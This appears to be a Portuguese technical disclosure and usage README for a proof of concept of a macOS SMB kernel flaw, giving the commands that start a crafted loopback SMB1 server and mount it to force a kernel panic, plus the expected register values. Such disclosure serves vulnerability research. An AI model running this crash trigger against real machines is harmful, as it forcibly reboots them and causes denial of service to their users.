
Prova de conceito e divulgação técnica para CVE-2026-84543, uma vulnerabilidade do kernel SMB do macOS que provoca kernel panic através de respostas SMB1 manipuladas.
Espera-se que esta prova de conceito cause kernel panic e reinicie um Mac afetado.
As builds de teste afetadas usadas durante a pesquisa foram o macOS Tahoe 26.4 (25E246) e o macOS 26.5 beta 4 (25F5068a). A Apple corrigiu o CVE-2026-84543 no macOS Golden Gate 27, Tahoe 26.7 e Sequoia 15.8.
smb1_unix_whoami_poc.py é o servidor de captura de evidências em loopback. Ele usa apenas
a biblioteca padrão do Python e:
_COMM_PAGE_ASB_TARGET_KERN_VALUE do boot atual em Apple silicon;SMB_QFS_POSIX_WHOAMI (0x0202) manipulada para criar o
estado inconsistente de contagem/ponteiro; e0x020B) contendo valores canary reconhecíveis
para proveniência de registradores de panic.No terminal A:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
Anote o ASB_TARGET_KERN_VALUE impresso; ele é randomizado no boot.
No terminal B:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
Com T igual ao canary de valor de kernel impresso no boot:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
Os bits específicos em x8, x9 e x11 estabelecem a proveniência. As relações
observadas fornecem um vínculo byte a byte entre os campos de resposta do servidor
e o estado dos registradores do kernel em execução.